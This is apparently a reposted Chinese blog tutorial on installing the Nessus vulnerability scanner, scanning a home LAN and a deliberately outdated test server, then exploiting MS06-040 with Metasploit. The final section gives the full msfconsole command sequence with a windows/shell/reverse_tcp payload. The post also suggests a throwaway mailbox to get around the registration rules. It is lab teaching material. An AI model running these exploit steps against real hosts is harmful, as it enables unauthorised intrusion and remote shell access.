『安全工具』Nessus多功能掃描器


0x 00 前言

  寫這篇博客,證明我還活着……

  

0x 01 安裝Nessus 

  直接官網  www.tenable.com/products/nessus/select-your-operating-system

  選擇Nessus Home版下載,下載之后點擊安裝我這里是Nessus-6.1.0-x64版(附件處有百度網盤鏈接)

  安裝開始設置一個用戶名和密碼(記住,使用Nessus時會驗證)

  然后選擇文件安裝目錄

  之后會提示更新插件,這個要通過官網注冊獲取激活碼來更新的

  我們在官網 www.tenable.com/products/nessus/evaluate 注冊賬戶,打開注冊郵箱就可以收到激活碼了~

  注意:注冊郵箱不能使用 qq\163\gmail\hotmail 等公共郵箱,要用企業郵箱才可以

  在這里推薦使用“一小時郵箱”進行注冊,具體使用方法問度娘吧

  填好激活碼之后,插件自動更新,我這里5分鍾左右就更新好了

0x 02  軟件使用

    瀏覽器打開  https://localhost:8834   后顯示客戶端界面

    輸入先前設置的用戶名密碼登錄

  1. 掃描局域網存活主機

    點擊“New Scan”,

    在提供的默認模版里選擇一個模版,這里選擇“Host Discovery”,

    在彈出的通用配置里設置“Name”(本次掃描的名字),“Target”(掃描目標)

    我掃的是192.168.1.1全網段的 ,看圖

     

    之后“點擊保存”后會進行自動掃描

    2分鍾之后結果就來了,在這里

      

    看到了米有,9個主機在線,測試結果與真實環境相同的

    NMAP也能完成主機探測我會亂說,所以說Nessus牛的地方不是在這,所以下面來了

  2. 主機掃描

    我在本地搭了個低版本服務器,IP為192.168.1.112

    新建掃描,設置掃描策略為“Advanced Scan”,

    然后 “Target”填上192.168.1.112

    因為掃的是同個局域網內的速度還是比較快的,結果倒是讓我驚呆了Orz...

    

    20個緊急漏洞,8個高危漏洞,醉了有木有 = =  速度戳之

    

    上面MSxx-xxx是微軟漏洞編碼,隨隨便便選擇一個找到Exp就可以愉悅的玩耍了  ~~

    接下來漏洞結合MSF進行漏洞利用~

    當然,直接根據漏洞的編碼百度一下利用方法也是可以的,這里就直接用BT5吧

    找一個比較老的洞:ms06-040

    BT5 的 CMD 輸入 msfconsole 進入MSF歡迎界面(時間略長,等下就OK了)

    我們按照MSF的一般執行過程來操作(選擇模版—設置PAYLOAD—設置參數—攻擊)

search ms06_040        // 查找ms06_040相關漏洞模塊

    找到對應模塊后 

use exploit/windows/smb/ms06_040_netapi  // 使用ms06_040_netapi模塊
show options        // 查看漏洞配置信息
set PAYLOAD windows/shell/reverse_tcp      // 設置PAYLOAD
set RHOST 192.168.1.112    // 目標IP
set LHOST 192.168.1.117    // 本機IP
// 端口號 和 目標類型 默認就OK了
exploit        // 進行攻擊

    然后看拿到拿到了神馬……

      

 

附件:

  Nessus-6.1.0-x64  百度網盤:pan.baidu.com/s/1hq48j20      9fgu

  

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM